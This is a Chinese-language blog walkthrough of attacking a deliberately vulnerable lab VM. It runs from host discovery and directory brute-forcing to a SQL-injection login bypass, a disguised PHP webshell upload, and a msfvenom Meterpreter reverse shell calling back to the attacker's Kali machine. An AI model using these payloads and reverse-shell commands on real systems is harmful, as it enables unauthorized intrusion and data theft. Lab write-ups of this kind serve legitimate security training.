kali对未知web server透测试2

环境介绍

主机 IP(NAT)
kali 192.168.252.128
靶机2 未知

靶机下载:https://pan.baidu.com/s/1u5xbmU13wheXE4_M508qFw
提取码:1234

打开靶机

kali对未知web server透测试2_第1张图片

kali对未知web server透测试2_第2张图片

kali对未知web server透测试2_第3张图片

主机探测

NAT网卡位于192.168.252.0/24网段
kali对未知web server透测试2_第4张图片

进行主机探测

netdiscover -i eth0 -r 192.168.252.0/24

kali对未知web server透测试2_第5张图片

信息收集

kali对未知web server透测试2_第6张图片

访问web界面
kali对未知web server透测试2_第7张图片


没有发现可疑渗透点,这里使用目录爆破,看一下有没有隐藏界面。

 dirb http://192.168.252.129/ 

kali对未知web server透测试2_第8张图片
kali对未知web server透测试2_第9张图片
发现有uplaods
kali对未知web server透测试2_第10张图片

再使用AWVS扫描器进行扫描,
AWVS安装方法:https://blog.csdn.net/qq_39583774/article/details/118766805

kali对未知web server透测试2_第11张图片
结构扫描到login界面
kali对未知web server透测试2_第12张图片
kali对未知web server透测试2_第13张图片
查看源代码

kali对未知web server透测试2_第14张图片
kali对未知web server透测试2_第15张图片
意思是只能以@btrisk.com结尾
使用万能密码绕过最后使用’OR 1=1#@btrisk.com成功绕过

账号:'OR 1=1#@btrisk.com
密码随便

kali对未知web server透测试2_第16张图片
发现上传点
kali对未知web server透测试2_第17张图片

尝试上传文件
kali对未知web server透测试2_第18张图片
这里提示只能上传jpg,png格式。
修改扩展名上传
kali对未知web server透测试2_第19张图片

失败过程

kali对未知web server透测试2_第20张图片

发现上传成功,由此得到并没有对内容过滤。
写入一句话木马


kali对未知web server透测试2_第21张图片
记得把扩展名改为png或者jpg
kali对未知web server透测试2_第22张图片

使用burp修改扩展名为php
kali对未知web server透测试2_第23张图片

kali对未知web server透测试2_第24张图片
点击发送
kali对未知web server透测试2_第25张图片
点击运行木马
kali对未知web server透测试2_第26张图片
使用中国菜刀连接
kali对未知web server透测试2_第27张图片
成功反弹shell,查看权限
kali对未知web server透测试2_第28张图片
kali对未知web server透测试2_第29张图片
这里应该是制作靶机的人失误了,直接把数据库密码写在这里。
kali对未知web server透测试2_第30张图片
但是菜刀一直卡在这里,可以放弃这种方式,去查找提权脚本。
kali对未知web server透测试2_第31张图片

kali对未知web server透测试2_第32张图片

在kali中开启apache2服务把脚本上传到html目录下kali对未知web server透测试2_第33张图片

在靶机中的高权限目录中下载提权脚本
kali对未知web server透测试2_第34张图片
kali对未知web server透测试2_第35张图片
这里提权脚本一直卡着,不知道是什么问题,有人知道什么问题可以解决一下。
另辟蹊径

使用kali进行制作木马连接。
在kali中开启监听模块。

 msfconsole 
 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 192.168.252.128
 run

kali对未知web server透测试2_第36张图片

制作木马文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.252.128 lport=4444 -f raw > muma.php

kali对未知web server透测试2_第37张图片
在菜刀中删除刚刚上传的木马,再次上传。
kali对未知web server透测试2_第38张图片
修改扩展名上传
kali对未知web server透测试2_第39张图片
点击运行
回到kali此时kali已经反弹shell
kali对未知web server透测试2_第40张图片
输入shell进入shell
kali对未知web server透测试2_第41张图片
使用python调用本地shell

python -c "import pty;pty.spawn('/bin/bash')"

kali对未知web server透测试2_第42张图片
到这里发现应该是提权脚本把数据库文件删除了,此时数据库服务已经挂了gg。
kali对未知web server透测试2_第43张图片
只能重新开一个一样的虚拟机,直接使用kali登录数据库。

成功过程

kali对未知web server透测试2_第44张图片
kali对未知web server透测试2_第45张图片
在这里插入图片描述
成功进入系统
kali对未知web server透测试2_第46张图片

修改完密码就可以登录了。

这里使用提权脚本会删库,我尝试过使用脏牛提权发现也会失败,不知道什么原因,有知道的望告知,谢谢了!!!

你可能感兴趣的:(kali,web,渗透,kali,linux,数据库,mysql,shell,安全)